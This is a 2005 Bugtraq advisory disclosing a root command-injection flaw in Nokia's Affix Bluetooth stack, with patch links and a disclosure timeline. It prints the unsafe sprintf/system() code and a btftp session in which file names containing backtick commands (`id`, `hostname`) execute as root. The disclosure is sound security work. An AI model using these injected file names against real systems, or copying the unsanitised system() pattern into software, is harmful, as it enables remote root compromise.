MA[2005-0712b] - 'Nokia Affix Bluetooth btsrv/btobex poor use of system()'

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: MA[2005-0712b] - 'Nokia Affix Bluetooth btsrv/btobex poor use of system()'
From: "KF (lists)" <kf_lists@xxxxxxxxxxxxxxxxxxx>
Date: Tue, 12 Jul 2005 12:19:52 -0400
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050513 Debian/1.7.8-1

DMA[2005-0712b] - 'Nokia Affix Bluetooth btsrv/btobex poor use of system()'
Author: Kevin Finisterre
Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net
Product: 'affix'
References: 
http://www.digitalmunition.com/DMA[2005-0712b].txt

Description: 
Affix is a Bluetooth Protocol Stack for Linux that was developed by the Nokia 
Research Center in 
Helsinki and released under GPL. Affix supports the core Bluetooth protocols 
like HCI, L2CAP 1.1, 
L2CAP 1.2, RFCOMM, SDP and various Bluetooth profiles. Affix consists of 
'affix-kernel' which 
provides kernel modules and 'affix' which provides control tools, libraries, 
and server daemons.

Although Nokia believes that Affix is an useful piece of software, please bear 
in mind that it is 
not an official Nokia product, but a result of the research activity of Nokia 
Research Center.

The following code snippet was found in affix-3.2.0/obex/btobex.c:

char    cmd[PATH_MAX];
sprintf(cmd, "/bin/mv \"%s\" \"%s\"", file, name);
fd = system(cmd);
if (fd) {
        BTERROR("failed: system(\"%s\") = %d\n", cmd, fd);
}

Exploitation of the above bug is fairly trivial with a little help from the 
btftp client. 
Please note that btsrv should be run as root to allow access to Bluetooth 
devices.

animosity:~# btftp
Affix version: Affix 3.2.0
Welcome to btftp (OBEX) tool. Type ? for help.
Mode: Bluetooth
ftp> open 01:02:03:04:05:06
Service found on channel: 6
Connected.

ftp> put /etc/hosts `id`
Transfer started...
Transfer complete.
257 bytes sent in 0.9 secs (2855.56 B/s)
ftp> ls
-rwdx           257             uid=0(root) gid=0(root) groups=0(root)
Command complete.

ftp> put /etc/hosts `hostname`
Transfer started...
Transfer complete.
257 bytes sent in 0.7 secs (3671.43 B/s)
ftp> ls
-rwdx           257             uid=0(root) gid=0(root) groups=0(root)
-rwdx           257             frieza
Command complete.

As you can see in the ps output no input cleaning is done on the user supplied 
data, thus
we are able to execute commands as root. 

root       803   802  0 10:27 ttyp2    00:00:00 btsrv -C ./btsrv.conf
root       820   803  0 10:31 ttyp2    00:00:00 /usr/local/bin/btobex
root       871   820  0 10:40 ttyp2    00:00:00 sh -c mv "/tmp/obex_tmp_ymZF0T" 
"`id`"
root       872   871  0 10:40 ttyp2    00:00:00 sh -c mv "/tmp/obex_tmp_ymZF0T" 
"`id`"

No exploit is required in order to take advantage of the above mentioned issue. 

Official patches for Affix can be found at http://affix.sourceforge.net
http://affix.sourceforge.net/affix_320_sec.patch
http://affix.sourceforge.net/affix_212_sec.patch

This is basic timeline associated with this bug. 

07/12/05 Public disclosure
07/11/05 notice that Security update.Patch for affix-3.2.0 was posted 07/01/05
07/06/05 Ask Carlos for update... 
06/17/05 Carlos.Chinea stated "you are using a old version of affix...Please 
update"
06/14/05 Carlos.Chinea contacted

-KF

Prev by Date: MITKRB5-SA-2005-003: double-free in krb5_recvauth
Next by Date: [SECURITY] [DSA 753-1] New gedit packages fix denial of service
Previous by thread: Re: MITKRB5-SA-2005-003: double-free in krb5_recvauth
Next by thread: [SECURITY] [DSA 753-1] New gedit packages fix denial of service
Index(es):
- Date
- Thread